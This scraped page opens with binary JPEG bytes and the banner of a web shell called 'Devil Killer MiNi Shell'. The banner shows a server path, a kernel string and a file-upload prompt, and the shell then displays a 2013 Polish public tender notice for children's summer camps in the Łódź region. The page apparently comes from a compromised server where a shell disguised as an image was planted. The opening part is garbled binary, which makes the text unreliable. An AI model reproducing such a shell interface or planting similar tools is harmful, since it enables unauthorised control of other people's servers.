JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130605/216806-N-2013.html

<p class="kh_header"><b>Łódź: Przedmiotem zamówienia jest zorganizowanie wypoczynku letniego na terenie kraju  dla dzieci bez 
    zabezpieczenia socjalnego z województwa łódzkiego.</b><br>
<b>Numer ogłoszenia: 216806 - 2013; data zamieszczenia: 05.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kuratorium Oświaty w Łodzi , al. Kościuszki 120a, 90-446 Łódź, woj. łódzkie, tel. 042 6371867, faks 042 6360385.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kuratorium.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest zorganizowanie wypoczynku letniego na terenie kraju  dla dzieci bez 
    zabezpieczenia socjalnego z województwa łódzkiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZADANIE I   -  organizacja kolonii nad morzem z realizacją programu edukacyjnego dla każdej grupy kolonijnej z zakresu warsztatów wokalnych -10 godz. - dla 130 dzieci ze szkół podstawowych z powiatów: łaskiego -  34 dzieci, pajęczańskiego - 28 dzieci, wieluńskiego - 35 dzieci, wieruszowskiego - 18 dzieci. 
Termin realizacji zamówienia: 1 lub 2 turnusy - w wybranym przez wykonawcę terminie od 08.07.2013 r. - 31.08.2013 r.

ZADANIE II  -  organizacja kolonii nad morzem z realizacją programu edukacyjnego dla każdej grupy kolonijnej z zakresu udzielania pomocy przedmedycznej -10 godz. dla 140 dzieci ze szkół podstawowych z powiatów: poddębickiego - 24 dzieci, sieradzkiego - 60 dzieci, zduńskowolskiego - 38 dzieci. 
Termin realizacji zamówienia: 1 lub 2 turnusy - w wybranym przez wykonawcę terminie od 08.07.2013 r. - 31.08.2013 r.
ZADANIE III  -  organizacja kolonii nad morzem z realizacją programu edukacyjnego dla każdej grupy kolonijnej z zakresu warsztatów fotograficznych -10 godz. dla 168 dzieci ze szkół podstawowych z Łodzi. 
Termin realizacji zamówienia: 1 lub 2 turnusy w wybranym przez wykonawcę terminie od 08.07.2013 r. - 31.08.2013 r.
2. Uszczegółowienie przedmiotu zamówienia dla ZADAŃ od I do III.
2.1. Przez obiekt kolonijny rozumie się budynek, pawilon lub zespół budynków, pawilonów zlokalizowanych w jednym kompleksie i bezpośrednio ze sobą  sąsiadujących, położony z dala, tzn. co najmniej 100 m, od dróg i ulic o dużym natężeniu ruchu samochodowego. Obiekt przeznaczony na placówkę wypoczynku dzieci musi spełniać wymogi dotyczące bezpieczeństwa, ochrony 
przeciwpożarowej, warunków higieniczno-sanitarnych oraz ochrony środowiska określonych przepisami: o ochronie przeciwpożarowej i Prawa budowlanego, Państwowej Inspekcji Sanitarnej i ochronie środowiska. Zamawiający nie dopuszcza zakwaterowania w szkołach tj. w izbach lekcyjnych oraz w domkach kampingowych. Zamawiający preferuje zakwaterowanie na parterze oraz I piętrze i nie dopuszcza zakwaterowania dzieci na kondygnacjach powyżej II - piętra. 
2.2. Obiekt kolonijny, w którym będzie zorganizowany wypoczynek dzieci winien spełniać co najmniej następujące wymogi:
a) zakwaterowanie dzieci w pokojach, maksymalnie 5 osobowych wyposażonych w łóżka z pościelą, oddzielne dla każdego dziecka zakwaterowanego w pokoju. Zamawiający nie dopuszcza łóżek piętrowych.  
b) pełny węzeł sanitarny z ciepłą i zimną wodą przez całą dobę w łazienkach usytuowanych w pokoju lub na korytarzu kondygnacji, na której będą zakwaterowane dzieci.
Zamawiający zaznacza, że  nie dopuszcza usytuowania łazienek na zewnątrz budynku, w którym będą zakwaterowane dzieci. Zamawiający wymaga, aby łazienki były sprzątane przez pracownika ośrodka kolonijnego co drugi dzień.
c) każdy pokój musi być wyposażony co najmniej w szafę z wieszakami i półkami w ilości zapewniającej rozpakowanie bagażu przez każde dziecko zakwaterowane w pokoju, stół, dwa krzesła oraz szafki nocne po jednej dla każdego dziecka zakwaterowanego w pokoju,
d)   posiadać jadalnię usytuowaną na terenie obiektu kolonijnego,
e)  posiadać oddzielną świetlicę wyposażoną w: TV, video, sprzęt audio oraz różne gry świetlicowe dla grupy co najmniej 20 dzieci, książki, czasopisma młodzieżowe oraz odrębne sale do prowadzenia zajęć warsztatowych (patrz warunek udziału odpowiedni dla ZADANIA).
f)  posiadać dla chorych dziewcząt i chłopców odrębne izolatki z łazienką lub węzłem sanitarnym (umywalka + wc),
g) teren obiektu kolonijnego musi być oświetlony latarniami elektrycznymi i otoczony ogrodzeniem (z wyłączeniem ogrodzenia naturalnego: np. żywopłot, tuja, drzewa i krzewy), które zabezpiecza wejście/wyjście do i z obiektu.
h) dysponować dostępem do boisk sportowo-rekreacyjnych na terenie obiektu lub w odległości do 300 m od niego. Ponadto Wykonawca winien dysponować co najmniej następującym sprzętem sportowo-rekreacyjnym przed rozpoczęciem każdego turnusu: co najmniej 10 piłek do siatkówki, 1 siatka do gry w piłkę siatkową, 5 piłek do gry w piłkę nożną, stół do ping-ponga (2 komplety rakietek do gry), 20 skakanek, 10 kompletów (rakietki) do gry w badmintona. 
i) posiadać dostęp do strzeżonego kąpieliska położonego w odległości do max 1000 m od obiektu kolonijnego oraz opiekę ratownika podczas kąpieli dzieci. Wymóg ten nie dotyczy wypoczynku organizowanego w górach.
 j) posiadać aktualną na rok 2013 r. opinię właściwej miejscowo straży pożarnej o dopuszczeniu  obiektu do zorganizowania w nim wypoczynku dla dzieci i młodzieży lub aktualnym protokołem właściwej miejscowo straży pożarnej dopuszczającym obiekt do użytkowania, jeśli wykonawca nie dysponuje aktualną opinią w dniu składania ofert.
2.3. Organizacja wypoczynku musi być zgodna z wymogami rozporządzenia MEN z dn. 21.01.1997 r. w sprawie warunków jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 1997 r. Nr 12 poz. 67 z póź. zm.), a ponadto obejmować:
a)  14-dniowy pobyt dzieci w ośrodku /w tym 13 noclegów/. Przez 14 dniowy pobyt rozumie się 13 noclegów i 14 pełnych dziennych posiłków: śniadanie, obiad, podwieczorek, kolacja. 
Zamawiający wymaga, aby wykonawca dzienną stawkę tzw. wsadu do kotła przyjął 
w wysokości 18 zł/dziecko. Wsad do kotła będzie musiał być przez wykonawcę   
udokumentowany dziennym raportem żywieniowym, który powinien zawierać, w szczególności: dane o liczbie żywionych dzieci w danym dniu, jadłospis, zlecenie wydania z magazynu produktów żywnościowych.
Żywienie uczestników wypoczynku powinno odbywać się zgodnie z zasadami higieny oraz racjonalnego żywienia określonymi w odrębnych przepisach. 
b) pierwszy dzień pobytu dzieci na koloniach rozpoczyna się obiadem po przyjeździe dzieci do ośrodka bez względu na godzinę przyjazdu.  
c) ostatni dzień pobytu dzieci na koloniach kończy się śniadaniem i wydaniem dzieciom suchego prowiantu na drogę powrotną. Wartość paczki stanowiącej suchy prowiant będzie stanowiła dzienną stawkę tzw. (wsadu do kotła) tj. 18 zł, na które składa się śniadanie z pierwszego dnia oraz obiad i kolacja z ostatniego dnia pobytu dzieci na koloniach.
d) uczestnicy wypoczynku muszą mieć stały dostęp do napojów (woda, soki, herbata, kompot).
2.4. Realizację oferty programowej (warsztatowej) obejmującej wymaganą przez zamawiającego liczbę godzin odpowiednio dla zadania i dla każdej grupy kolonijnej, na które wykonawca składa ofertę oraz ofertę programową zawierającą takie jej elementy jak: co najmniej 3 zabawy quizowe, 3 konkursy z nagrodami rzeczowymi i dyplomami, 3 dyskoteki, 2 ogniska, kolonijną olimpiadę sportową. Wykonawca może ofertę programową rozszerzyć o wycieczki autokarowe, rowerowe, piesze.
2.5. Opiekę pedagogiczną wychowawców w czasie przejazdu na kolonie poprzez opiekę w czasie pobytu dzieci na kolonii aż do wydania dzieci rodzicom lub prawnym opiekunom w miejscu przyjazdu dzieci z kolonii. Zamawiający nie dopuszcza sytuacji, w której w czasie podróży dzieci na i z kolonii opiekę będzie sprawowała inna osoba niż wychowawcy przypisani do każdej grupy kolonijnej. 
2.6. Pełną opiekę medyczną przez 24 godz/dobę (pielęgniarka na stałe, a lekarz na wezwanie). 
Wykonawcę obowiązuje zabezpieczenie apteczki w podstawowe leki i materiały opatrunkowe do udzielenia, w razie konieczności pierwszej pomocy przedlekarskiej.
2.7. Koszty przejazdu dzieci na i z kolonii sprawnym technicznie autokarem, który w dniu wyjazdu (podstawienia autokaru na miejsce zbiórki) posiada wszystkie aktualne przeglądy i dokumenty wymagane do przewozu pasażerów. Nie dopuszcza się przewozu dzieci w godzinach 22.00 - 6.00.
       Miejscowością wyjazdu dzieci na kolonie będzie: 
       dla ZADANIA I	 - Łask, Pajęczno, Wieluń, Wieruszów 
       dla ZADANIA II 	 - Poddębice, Sieradz, Zduńska Wola
       dla ZADANIA III	 -  Łódź
       Zamawiający zastrzega sobie prawo, poddania podstawionego autokaru oraz kierowcy/ów 
       kontroli przez policję.
2.8. Koszty ubezpieczenia dzieci w czasie podróży i pobytu dzieci na koloniach od następstw 
        nieszczęśliwych wypadków,
2.9. Doposażenie w podstawowe przedmioty codziennego użytku (np. środki higieny osobistej, 
        niezbędną odzież, obuwie) uczestników tego wymagających. Dokumentację potwierdzającą 
        fakt wydania dzieciom dodatkowego doposażenia Wykonawca będzie zobowiązany okazywać do 
        wglądu podczas kontroli kolonii. 

3. Zamawiający dopuszcza zmianę liczby uczestników kolonii w stosunku do tej określonej w SIWZ   
     (odrębnie dla każdej części zadania), o + - 15 %. Dokładną liczbę dzieci, skierowanych na kolonie, 
     zamawiający określi najpóźniej w dniu podpisania umowy.
     W takim przypadku wartość zamówienia będzie wyliczona według następującej formuły: 
     Ilość dzieci x ofertowa cena (brutto) skierowania 1 dziecka..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że posiada zaświadczenie o wpisie do rejestru organizatorów i pośredników turystycznych, wydane przez marszałka województwa właściwego dla siedziby przedsiębiorcy, a jego aktualność potwierdzi wydrukiem z Centralnej Ewidencji Organizatorów Turystyki i Pośredników Turystycznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca udokumentuje, że w okresie ostatnich 
    3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy
    - w tym okresie wykonał, co najmniej 3 usługi, z których każda polegała na kompleksowej 
    organizacji 14 - dniowego wypoczynku obejmującej zakwaterowanie, wyżywienie, transport, 
    realizację programu, zapewnienie opieki pedagogicznej i medycznej dla co najmniej połowy liczby 
    dzieci określonej niniejszą SIWZ (rozdział III pkt 1) dla numeru zadania, na które wykonawca 
    składa ofertę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca udokumentuje, że dysponuje lub będzie 
    dysponował w dacie wykonywania zamówienia w miejscu jego wykonywania:
a/ obiektem kolonijnym spełniającym co najmniej wymogi określone w SIWZ (rozdział III ust. 2 pkt 
     2.1 i 2.2) oraz aktualną na rok 2013 r. opinią właściwej miejscowo straży pożarnej o dopuszczeniu  
     obiektu do zorganizowania w nim wypoczynku dla dzieci i młodzieży lub aktualnym protokołem 
     właściwej miejscowo straży pożarnej dopuszczającym obiekt do użytkowania, jeśli wykonawca nie 
     dysponuje aktualną opinią w dniu składania ofert,
b/ kierownikiem kolonii z uprawnieniami MEN z dn. 21.01.1997 r. (Dz. U. z 1997 r Nr 218 12 poz. 67 
    z póź. zm.) i udokumentowanym (poprzez wskazanie dat, miejsca i organizatora wypoczynku), 
    minimum trzyletnim doświadczeniem w pełnieniu funkcji kierownika kolonii, przy czym kierownik 
    kolonii nie może być jednocześnie wychowawcą,
c/ wychowawcami z uprawnieniami MEN z dn. 21.01.1997 r. (Dz. U. z 1997 r Nr 218 12 poz. 67 z póź. 
    zm.) i udokumentowanym (poprzez wskazanie dat, miejsca i organizatora wypoczynku), 
    doświadczeniem w pracy jako wychowawca kolonijny na co najmniej trzech, 14-dniowych 
    turnusach lub 4-ch turnusach 10 dniowych,
    
    UWAGA: Należy uwzględnić następujące zatrudnienie - co najmniej 1 wychowawca na grupę 15 
                    uczestników. 

d/ pielęgniarką z prawem wykonywania zawodu, zgodnie z ustawą z dnia 5 lipca 1996 r. o zawodach
    pielęgniarki i położnej (Dz. U. z 2009 r. Nr 151, poz. 1217 i Nr 219, poz. 1706); obecną w ośrodku  
    przez 24 h,
e/ratownikiem posiadającym kurs pozwalający na pełnienie funkcji ratownika wodnego oraz 
    udokumentowane (poprzez wskazanie dat, miejsca i organizatora wypoczynku), doświadczenie 
    tj. co najmniej dwa sezony letnie w pełnieniu funkcji ratownika,

Ponadto Zamawiający wymaga, aby wykonawca dysponował:

Przy realizacji zadania nr I z programem z zakresu warsztatów wokalnych, oprócz kadry wychowawców zgodnej z wymogami rozporządzenia MEN z 21.01.1997 r. instruktorem śpiewu lub nauczycielem muzyki. 
Ponadto Zamawiający wymaga, aby dla realizacji oferty programowej z zakresu śpiewu, wykonawca dysponował co najmniej następującymi pomocami dydaktycznymi: pianino lub fortepian lub kibord, płyty i nagrania muzyczne, mikrofony - co najmniej 5 szt., dostępem do odrębnej sali do prowadzenia zajęć śpiewu w czasie niepogody, przy czym nie może to być świetlica ogólnie dostępna.

Przy realizacji zadania nr II  z programem z zakresu warsztatów udzielania pomocy przedmedycznej, oprócz kadry wychowawców zgodnej z wymogami rozporządzenia MEN z dn. 21.01.1997 r., ratownikiem medycznym. 
Ponadto Zamawiający wymaga, aby dla realizacji oferty programowej z zakresu  udzielania pomocy przedmedycznej wykonawca dysponował co najmniej następującymi pomocami dydaktycznymi: apteczki pierwszej pomocy - min. szt. 5, fantom - szt. 1.  

Przy realizacji zadania nr III z zakresu warsztatów fotograficznych oprócz kadry wychowawców zgodnej z wymogami rozporządzenia MEN z dn. 21.01.1997 r., instruktorem fotografiki. 
Ponadto Zamawiający wymaga, aby dla realizacji oferty programowej z zakresu fotografiki, wykonawca dysponował co najmniej następującymi pomocami dydaktycznymi: aparatami fotograficznymi (cyfrowymi) - min. 8 szt.,  salą do obróbki zdjęć wraz z dostępem do 3 komputerów 
i drukarką do wydruku w kolorze, przy czym nie może to być świetlica ogólnie dostępna.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca udokumentuje, że dysponuje lub będzie 
    dysponował w dacie wykonywania zamówienia w miejscu jego wykonywania:
a)kierownikiem kolonii z uprawnieniami MEN z dn. 21.01.1997 r. (Dz. U. z 1997 r Nr 218 12 poz. 67 
    z póź. zm.) i udokumentowanym (poprzez wskazanie dat, miejsca i organizatora wypoczynku), 
    minimum trzyletnim doświadczeniem w pełnieniu funkcji kierownika kolonii, przy czym kierownik 
    kolonii nie może być jednocześnie wychowawcą,
b) wychowawcami z uprawnieniami MEN z dn. 21.01.1997 r. (Dz. U. z 1997 r Nr 218 12 poz. 67 z póź. 
    zm.) i udokumentowanym (poprzez wskazanie dat, miejsca i organizatora wypoczynku), 
    doświadczeniem w pracy jako wychowawca kolonijny na co najmniej trzech, 14-dniowych 
    turnusach lub 4-ch turnusach 10 dniowych,
    
    UWAGA: Należy uwzględnić następujące zatrudnienie - co najmniej 1 wychowawca na grupę 15 
                    uczestników. 

c) pielęgniarką z prawem wykonywania zawodu, zgodnie z ustawą z dnia 5 lipca 1996 r. o zawodach
    pielęgniarki i położnej (Dz. U. z 2009 r. Nr 151, poz. 1217 i Nr 219, poz. 1706); obecną w ośrodku  
    przez 24 h,
d)ratownikiem posiadającym kurs pozwalający na pełnienie funkcji ratownika wodnego oraz 
    udokumentowane (poprzez wskazanie dat, miejsca i organizatora wypoczynku), doświadczenie 
    tj. co najmniej dwa sezony letnie w pełnieniu funkcji ratownika,

Ponadto Zamawiający wymaga, aby wykonawca dysponował:

Przy realizacji zadania nr I z programem z zakresu warsztatów wokalnych, oprócz kadry wychowawców zgodnej z wymogami rozporządzenia MEN z 21.01.1997 r. instruktorem śpiewu lub nauczycielem muzyki. 
Ponadto Zamawiający wymaga, aby dla realizacji oferty programowej z zakresu śpiewu, wykonawca dysponował co najmniej następującymi pomocami dydaktycznymi: pianino lub fortepian lub kibord, płyty i nagrania muzyczne, mikrofony - co najmniej 5 szt., dostępem do odrębnej sali do prowadzenia zajęć śpiewu w czasie niepogody, przy czym nie może to być świetlica ogólnie dostępna.

Przy realizacji zadania nr II  z programem z zakresu warsztatów udzielania pomocy przedmedycznej, oprócz kadry wychowawców zgodnej z wymogami rozporządzenia MEN z dn. 21.01.1997 r., ratownikiem medycznym. 
Ponadto Zamawiający wymaga, aby dla realizacji oferty programowej z zakresu  udzielania pomocy przedmedycznej wykonawca dysponował co najmniej następującymi pomocami dydaktycznymi: apteczki pierwszej pomocy - min. szt. 5, fantom - szt. 1.  

Przy realizacji zadania nr III z zakresu warsztatów fotograficznych oprócz kadry wychowawców zgodnej z wymogami rozporządzenia MEN z dn. 21.01.1997 r., instruktorem fotografiki. 
Ponadto Zamawiający wymaga, aby dla realizacji oferty programowej z zakresu fotografiki, wykonawca dysponował co najmniej następującymi pomocami dydaktycznymi: aparatami fotograficznymi (cyfrowymi) - min. 8 szt.,  salą do obróbki zdjęć wraz z dostępem do 3 komputerów 
i drukarką do wydruku w kolorze, przy czym nie może to być świetlica ogólnie dostępna.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca udokumentuje, że posiada:
a) aktualne i opłacone na dzień składania ofert ubezpieczenie OC lub zabezpieczenie finansowe 
    w zakresie prowadzonej działalności gospodarczej, o którym mowa w art. 5 ustawy o usługach 
    turystycznych z 29 sierpnia 1997 r. (tj. Dz. U. z 2004 r Nr 223 poz. 2268 z późn. zm.) oraz
    w rozporządzeniu Ministra Finansów z 16 grudnia 2010 r. (Dz. U. z 2010 r. Nr 238 poz. 1584)
    w sprawie minimalnej wysokości sumy gwarancji bankowej lub ubezpieczeniowej wymaganej 
    w związku z działalnością wykonywaną przez organizatorów turystyki i pośredników turystycznych - 
    na kwotę min. 4 500 euro.

UWAGA:  Jeśli wykonawca składa ofertę na dwa lub więcej ZADAŃ winien jest udokumentować, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej
z przedmiotem zamówienia na wartość nie mniejszą niż krotność kwoty min. 4 500 (np. gdy wykonawca składa oferty na dwa zadania to kwota ubezpieczenia OC nie może być mniejsza niż  
9 000 euro, na trzy zadania 13 500 euro, itd.). 

W sytuacji gdy ubezpieczenie OC nie obejmuje okresu zamówienia, na który wykonawca składa ofertę, wymagane jest złożenie przez wykonawcę zobowiązania o gotowości odnowienia polisy OC.

b) środki finansowe na rachunku bankowym bądź w spółdzielczej kasie oszczędnościowo-kredytowej
     lub zdolność kredytową w wysokości co najmniej:
     dla ZADANIA I	- 81 000 zł
     dla ZADANIA II	- 87 000 zł
     dla ZADANIA III- 97 000 zł
UWAGA:  Jeśli wykonawca składa ofertę na dwa lub więcej zadań winien jest udokumentować, że 
posiada środki finansowe na rachunku bankowym bądź w spółdzielczej kasie oszczędnościowo-
kredytowej lub zdolność kredytową w wysokości równej co najmniej sumie kwot określonych 
przez Zamawiającego, dla poszczególnych ZADAŃ zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykaz wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
        a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług w zakresie organizacji
        wypoczynku dla dzieci, w którym Wykonawca wykaże, że wykonał co najmniej 3 usługi 
        polegające na organizacji 14 - dniowego wypoczynku, dla co najmniej połowy liczby dzieci 
        określonej niniejszą SIWZ (rozdział III ust. 1) dla numeru zadania, na które wykonawca składa 
        ofertę - załącznik Nr 4 do SIWZ;
Wykaz winien uwzględniać:
a) nazwę przedmiotu zamówienia,
b) szczegółowy zakres wykonanego przedmiotu zamówienia (opis w celu potwierdzenia zgodności 
     usługi z przedmiotem zamówienia, na który wykonawca składa ofertę).
c) nazwę i adres zlecającego zamówienie,
d) termin realizacji zamówienia,
